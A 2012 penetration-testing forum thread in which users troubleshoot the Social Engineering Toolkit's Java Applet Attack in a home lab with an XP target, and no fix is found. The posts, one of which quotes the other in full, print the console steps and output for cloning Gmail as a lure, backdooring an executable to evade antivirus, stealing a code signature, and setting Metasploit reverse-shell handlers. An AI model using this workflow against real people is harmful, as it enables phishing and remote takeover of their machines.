SET not Cloning sites

**skorpinok7** · 07-04-2012, 09:46 AM

Hello,
I have regarding a problem based on Social Engineering Tool-kit, but the thing is same question has been posted by someone before me & he didnt get any solution, mine is similar to it.. if you have any idea regarding this subject please suggest me, i would greatly appreciate your help, i looked all over web, couldn't get any solution & Finally i had to come here.

Iam facing a strange problem within Social Engineering Toolkit, I have backtrack 5R2 in virtual environment with target windows XP SP2,
when i use the Java Applet Attack method, when i click the cloned site on xp machine instead of opening a meterpreter session i get this error (shown below ) right after msf loads, i have Reinstalled the BT5 R2 O.S itself & updated SET Twice, but no use. please let me know if you have any suggestions.

Regards.

Web Server Launched. Welcome to the SET Web Attack.
************************************************** *

[--] Tested on IE6, IE7, IE8, IE9, Safari, Opera, Chrome, and FireFox [--]

Moving payload into cloned website.
The site has been moved. SET Web Server is now listening..
[-] Launching MSF Listener...
[-] This may take a few to load MSF...
*] Started reverse handler on 10.0.2.15:8080
Starting the payload handler...
Exploit running as background job.

msf exploit(handler) >

Started reverse handler on 10.0.2.15:8081
Starting the payload handler...

192.168.56.102 - - [01/Jul/2012 06:44:51] "GET / HTTP/1.1" 200 -
192.168.56.102 - - [01/Jul/2012 06:44:52] code 404, message File not found
192.168.56.102 - - [01/Jul/2012 06:44:52] "GET /Java.class HTTP/1.1" 404 -
192.168.56.102 - - [01/Jul/2

**LHYX1** · 07-05-2012, 05:25 AM

Looks like the server can't find some files. Could you post the exact staps you took ?

**skorpinok7** · 07-06-2012, 01:27 PM

Originally Posted by LHYX1

Looks like the server can't find some files. Could you post the exact staps you took ?

First i got two machines inside virtual box , XP SP2 - 192.168.56.102 , Backtrack 5R2. - 192.168.56.101

Website Attack Vectors > Java Applet Attack Method > Web Templates > Gmail

Select a template:2

Code:

[*] Cloning the website: https://gmail.com[*] This could take a little bit...[*] Injecting Java Applet attack into the newly cloned website.[*] Filename obfuscation complete. Payload name is: GQ8v9SlNeEXSxym[*] Malicious java applet website prepped for deployment

set:payloads> Windows Reverse_TCP Meterpreter

Below is a list of encodings to try and bypass AV. Select one of the below, 'backdoored executable' is typically the best

Backdoored Executable (BEST)

PORT of the listener [443] (Press Enter)

*] Generating x64-based powershell injection code...[*] Generating x86-based powershell injection code...[*] Finished generating powershell injection attack and is encoded to bypass execution restriction...
[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...[*] Backdoor completed successfully. Payload is now hidden within a legit executable.[*] UPX Encoding is set to ON, attempting to pack the executable with UPX encoding.
[-] Packing the executable and obfuscating PE file randomly, one moment.[*] Digital Signature Stealing is ON, hijacking a legit digital certificate[*] Generating OSX payloads through Metasploit...[*] Generating Linux payloads through Metasploit...

***************************************************
Web Server Launched. Welcome to the SET Web Attack.
***************************************************

[--] Tested on IE6, IE7, IE8, IE9, Safari, Opera, Chrome, and FireFox [--]
[*] Moving payload into cloned website.[*] The site has been moved. SET Web Server is now listening..
[-] Launching MSF Listener...
[-] This may take a few to load MSF...
[-] ***
[-] * WARNING: Database support has been disabled
[-] ***

=[ metasploit v4.2.0-release [core:4.2 api:1.0]
+ -- --=[ 805 exploits - 451 auxiliary - 135 post
+ -- --=[ 246 payloads - 27 encoders - 8 nops
       =[ svn r14805 updated 134 days ago (2012.02.23)

Warning: This copy of the Metasploit Framework was last updated 134 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             https://community.rapid7.com/docs/DOC-1306
[*] Processing /pentest/exploits/set/src/program_junk/meta_config for ERB directives.
resource (/pentest/exploits/set/src/program_junk/meta_config)> use exploit/multi/handler
resource (/pentest/exploits/set/src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/pentest/exploits/set/src/program_junk/meta_config)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (/pentest/exploits/set/src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (/pentest/exploits/set/src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/pentest/exploits/set/src/program_junk/meta_config)> exploit -j[*] Exploit running as background job.
resource (/pentest/exploits/set/src/program_junk/meta_config)> use exploit/multi/handler
resource (/pentest/exploits/set/src/program_junk/meta_config)> set PAYLOAD osx/x86/shell_reverse_tcp
PAYLOAD => osx/x86/shell_reverse_tcp
resource (/pentest/exploits/set/src/program_junk/meta_config)> set LHOST 10.0.2.15
LHOST => 10.0.2.15
resource (/pentest/exploits/set/src/program_junk/meta_config)> set LPORT 8080
LPORT => 8080
resource (/pentest/exploits/set/src/program_junk/meta_config)> set InitialAutoRunScript post/osx/gather/enum_osx
InitialAutoRunScript => post/osx/gather/enum_osx
resource (/pentest/exploits/set/src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/pentest/exploits/set/src/program_junk/meta_config)> exploit -j[*] Started reverse handler on 0.0.0.0:443 [*] Starting the payload handler...[*] Exploit running as background job.
resource (/pentest/exploits/set/src/program_junk/meta_config)> use exploit/multi/handler
resource (/pentest/exploits/set/src/program_junk/meta_config)> set PAYLOAD linux/x86/shell/reverse_tcp
PAYLOAD => linux/x86/shell/reverse_tcp
resource (/pentest/exploits/set/src/program_junk/meta_config)> set LHOST 10.0.2.15
LHOST => 10.0.2.15
resource (/pentest/exploits/set/src/program_junk/meta_config)> set LPORT 8081
LPORT => 8081
resource (/pentest/exploits/set/src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/pentest/exploits/set/src/program_junk/meta_config)> exploit -j[*] Started reverse handler on 10.0.2.15:8080 [*] Starting the payload handler...[*] Exploit running as background job.
msf  exploit(handler) > [*] Started reverse handler on 10.0.2.15:8081 [*] Starting the payload handler...

After this i browse xp machine with backtrack ip 192.168.56.101,

then i get this on BT5...

192.168.56.102 - - [06/Jul/2012 22:36:12] "GET / HTTP/1.1" 200 -

192.168.56.102 - - [06/Jul/2012 22:36:13] "GET /Signed_Update.jar HTTP/1.1" 200 -

192.168.56.102 - - [06/Jul/2012 22:36:13] "GET /Signed_Update.jar HTTP/1.1" 200 -

192.168.56.102 - - [06/Jul/2012 22:36:19] "GET / HTTP/1.1" 200 -

192.168.56.102 - - [06/Jul/2012 22:36:19] "GET / HTTP/1.1" 200 -

192.168.56.102 - - [06/Jul/2012 22:36:20] "GET /Signed_Update.jar HTTP/1.1" 200 -

uninstalled BT5 & xp, reinstalled & did an SET update too, its same picture i get.

Regards
skorpinok

**deathknoll** · 09-05-2012, 01:40 PM

Originally Posted by skorpinok7

First i got two machines inside virtual box , XP SP2 - 192.168.56.102 , Backtrack 5R2. - 192.168.56.101

Website Attack Vectors > Java Applet Attack Method > Web Templates > Gmail

Select a template:2

Code:

[*] Cloning the website: https://gmail.com[*] This could take a little bit...[*] Injecting Java Applet attack into the newly cloned website.[*] Filename obfuscation complete. Payload name is: GQ8v9SlNeEXSxym[*] Malicious java applet website prepped for deployment

set:payloads> Windows Reverse_TCP Meterpreter

Below is a list of encodings to try and bypass AV. Select one of the below, 'backdoored executable' is typically the best



Backdoored Executable (BEST)

PORT of the listener [443] (Press Enter)

*] Generating x64-based powershell injection code...[*] Generating x86-based powershell injection code...[*] Finished generating powershell injection attack and is encoded to bypass execution restriction...
[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...[*] Backdoor completed successfully. Payload is now hidden within a legit executable.[*] UPX Encoding is set to ON, attempting to pack the executable with UPX encoding.
[-] Packing the executable and obfuscating PE file randomly, one moment.[*] Digital Signature Stealing is ON, hijacking a legit digital certificate[*] Generating OSX payloads through Metasploit...[*] Generating Linux payloads through Metasploit...

***************************************************
Web Server Launched. Welcome to the SET Web Attack.
***************************************************

[--] Tested on IE6, IE7, IE8, IE9, Safari, Opera, Chrome, and FireFox [--]
[*] Moving payload into cloned website.[*] The site has been moved. SET Web Server is now listening..
[-] Launching MSF Listener...
[-] This may take a few to load MSF...
[-] ***
[-] * WARNING: Database support has been disabled
[-] ***

=[ metasploit v4.2.0-release [core:4.2 api:1.0]
+ -- --=[ 805 exploits - 451 auxiliary - 135 post
+ -- --=[ 246 payloads - 27 encoders - 8 nops
       =[ svn r14805 updated 134 days ago (2012.02.23)

Warning: This copy of the Metasploit Framework was last updated 134 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             https://community.rapid7.com/docs/DOC-1306
[*] Processing /pentest/exploits/set/src/program_junk/meta_config for ERB directives.
resource (/pentest/exploits/set/src/program_junk/meta_config)> use exploit/multi/handler
resource (/pentest/exploits/set/src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/pentest/exploits/set/src/program_junk/meta_config)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (/pentest/exploits/set/src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (/pentest/exploits/set/src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/pentest/exploits/set/src/program_junk/meta_config)> exploit -j[*] Exploit running as background job.
resource (/pentest/exploits/set/src/program_junk/meta_config)> use exploit/multi/handler
resource (/pentest/exploits/set/src/program_junk/meta_config)> set PAYLOAD osx/x86/shell_reverse_tcp
PAYLOAD => osx/x86/shell_reverse_tcp
resource (/pentest/exploits/set/src/program_junk/meta_config)> set LHOST 10.0.2.15
LHOST => 10.0.2.15
resource (/pentest/exploits/set/src/program_junk/meta_config)> set LPORT 8080
LPORT => 8080
resource (/pentest/exploits/set/src/program_junk/meta_config)> set InitialAutoRunScript post/osx/gather/enum_osx
InitialAutoRunScript => post/osx/gather/enum_osx
resource (/pentest/exploits/set/src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/pentest/exploits/set/src/program_junk/meta_config)> exploit -j[*] Started reverse handler on 0.0.0.0:443 [*] Starting the payload handler...[*] Exploit running as background job.
resource (/pentest/exploits/set/src/program_junk/meta_config)> use exploit/multi/handler
resource (/pentest/exploits/set/src/program_junk/meta_config)> set PAYLOAD linux/x86/shell/reverse_tcp
PAYLOAD => linux/x86/shell/reverse_tcp
resource (/pentest/exploits/set/src/program_junk/meta_config)> set LHOST 10.0.2.15
LHOST => 10.0.2.15
resource (/pentest/exploits/set/src/program_junk/meta_config)> set LPORT 8081
LPORT => 8081
resource (/pentest/exploits/set/src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/pentest/exploits/set/src/program_junk/meta_config)> exploit -j[*] Started reverse handler on 10.0.2.15:8080 [*] Starting the payload handler...[*] Exploit running as background job.
msf  exploit(handler) > [*] Started reverse handler on 10.0.2.15:8081 [*] Starting the payload handler...

After this i browse xp machine with backtrack ip 192.168.56.101,

then i get this on BT5...

192.168.56.102 - - [06/Jul/2012 22:36:12] "GET / HTTP/1.1" 200 -

192.168.56.102 - - [06/Jul/2012 22:36:13] "GET /Signed_Update.jar HTTP/1.1" 200 -

192.168.56.102 - - [06/Jul/2012 22:36:13] "GET /Signed_Update.jar HTTP/1.1" 200 -

192.168.56.102 - - [06/Jul/2012 22:36:19] "GET / HTTP/1.1" 200 -

192.168.56.102 - - [06/Jul/2012 22:36:19] "GET / HTTP/1.1" 200 -

192.168.56.102 - - [06/Jul/2012 22:36:20] "GET /Signed_Update.jar HTTP/1.1" 200 -

uninstalled BT5 & xp, reinstalled & did an SET update too, its same picture i get.

Regards
skorpinok

Has anyone found a solution for this issue? I have been stuck on this for a couple of weeks. I am willing to pay for a solution.
Thanks.

**Lancha** · 12-18-2012, 10:38 AM

i have the same problem with you

BackTrack Linux - Penetration Testing Distribution

Thread: SET not Cloning sites

Thread Tools

Search Thread

Display

SET not Cloning sites

Re: SET not Cloning sites

Re: SET not Cloning sites

Re: SET not Cloning sites

Re: SET not Cloning sites

Similar Threads

Upgrading Laptop HDD - Cloning to external HDD?

SET & cloning webpage

Command used in SET for cloning

detecting MAC cloning, e.g. using RARP

Posting Permissions